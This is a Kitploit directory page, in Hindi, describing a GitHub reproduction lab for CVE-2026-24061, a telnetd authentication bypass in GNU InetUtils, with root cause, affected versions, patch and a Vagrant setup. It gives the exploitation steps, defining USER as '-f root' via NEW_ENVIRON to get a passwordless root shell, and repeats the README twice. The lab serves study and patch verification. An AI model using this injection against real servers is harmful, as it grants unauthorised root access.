Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061-lab — # CVE-2026-24061 के लिए प्रजनन प्रयोगशाला, GNU InetUtils telnetd में एक प्रमाणीकरण बाईपास। Vagrant-आधारित पृथक वातावरण और रूट शेल एक्सेस प्रदर्शित करने के लिए चरण-दर-चरण शोषण निर्देश प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

# CVE-2026-24061 के लिए प्रजनन प्रयोगशाला, GNU InetUtils telnetd में एक प्रमाणीकरण बाईपास। Vagrant-आधारित पृथक वातावरण और रूट शेल एक्सेस प्रदर्शित करने के लिए चरण-दर-चरण शोषण निर्देश प्रदान करता है।

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 — पुनरुत्पादन लैब

⚠️ केवल शैक्षिक उद्देश्यों के लिए। पृथक लैब वातावरण।

फ़्रेंच नीचे


सारांश

GNU InetUtils telnetd ≤ 2.7 में गंभीर प्रमाणीकरण बायपास (CVSS 9.8)। -f root को USER वेरिएबल के रूप में Telnet NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट करके, एक अप्रमाणित हमलावर बिना किसी पासवर्ड के रूट शेल प्राप्त कर सकता है।

मूल कारण

Telnet नेगोशिएशन के दौरान क्लाइंट से प्राप्त USER वेरिएबल को बिना सैनिटाइज़ेशन के सीधे /usr/bin/login में पास किया जाता है:

root@kitploit:~
/usr/bin/login -p -f root

-f फ्लैग login को बताता है कि वह दिए गए उपयोगकर्ता के लिए पासवर्ड सत्यापन छोड़ दे। यह व्यवहार RFC 1572 (अनुच्छेद 7) में एक ज्ञात जोखिम के रूप में प्रलेखित है — फिर भी यह बग inetutils में एक दशक से अधिक समय तक मौजूद रहा।

प्रभावित संस्करण

GNU InetUtils telnetd 1.9.3 से 2.7

पैच

GNU InetUtils ≥ 2.7-2 में अपग्रेड करें

लैब सेटअप

यह लैब Vagrant का उपयोग करके एक वास्तविक पृथक VM तैयार करता है जो telnetd (inetutils 2.5, सोर्स से संकलित) का असुरक्षित संस्करण चला रहा है, जिससे यह वास्तविक वातावरण के जितना संभव हो उतना करीब है।

आवश्यकताएँ: आपकी मशीन पर Vagrant + VirtualBox स्थापित होना चाहिए।

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

VM का IP 192.168.56.10 है और telnetd पोर्ट 23 पर सुनता है।

लैब तैयार

शोषण

अपनी होस्ट मशीन से:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

USER वेरिएबल को नेगोशिएशन चरण के दौरान NEW_ENVIRON Telnet विकल्प के माध्यम से इंजेक्ट किया जाता है — लॉगिन प्रॉम्प्ट प्रकट होने से पहले।

VM से कनेक्ट रूट शेल प्राप्त हुआ

संदर्भ

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet पर्यावरण विकल्प
  • GNU InetUtils स्रोत — telnetd/sys_term.c

लेखक

Agokoli



CVE-2026-24061 — प्रदर्शन लैब

⚠️ केवल शैक्षिक उपयोग। पृथक वातावरण।

अंग्रेज़ी ऊपर


सारांश

GNU InetUtils telnetd ≤ 2.7 में गंभीर प्रमाणीकरण बायपास (CVSS 9.8)। -f root को USER वेरिएबल के मान के रूप में Telnet NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट करके, एक अप्रमाणित हमलावर बिना किसी पासवर्ड के रूट शेल प्राप्त कर सकता है।

मूल कारण

Telnet नेगोशिएशन के दौरान क्लाइंट से प्राप्त USER वेरिएबल को बिना सत्यापन के सीधे /usr/bin/login में पास किया जाता है:

root@kitploit:~
/usr/bin/login -p -f root

-f फ्लैग login को बताता है कि वह दिए गए उपयोगकर्ता के लिए पासवर्ड सत्यापन न करे। यह जोखिम RFC 1572 (अनुच्छेद 7) में प्रलेखित है — फिर भी यह बग एक दशक से अधिक समय तक inetutils में मौजूद रहा।

प्रभावित संस्करण

GNU InetUtils telnetd 1.9.3 से 2.7

पैच

GNU InetUtils ≥ 2.7-2 में अपडेट करें

लैब सेटअप

यह लैब Vagrant का उपयोग करके एक वास्तविक पृथक VM तैयार करता है जो telnetd (inetutils 2.5, स्रोतों से संकलित) का असुरक्षित संस्करण चला रहा है, ताकि यह वास्तविक वातावरण के जितना संभव हो उतना करीब हो।

आवश्यकताएँ: आपकी मशीन पर Vagrant + VirtualBox स्थापित होना चाहिए।

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

VM का IP 192.168.56.10 है और telnetd पोर्ट 23 पर सुनता है।

लैब तैयार

शोषण

अपनी होस्ट मशीन से:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

USER वेरिएबल को नेगोशिएशन चरण के दौरान Telnet प्रोटोकॉल के NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट किया जाता है — login: प्रॉम्प्ट प्रकट होने से पहले ही।

VM से कनेक्शन रूट शेल प्राप्त हुआ

संदर्भ

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet पर्यावरण विकल्प
  • GNU InetUtils स्रोत कोड — telnetd/sys_term.c

लेखक

Agokoli

टूल डाउनलोड करें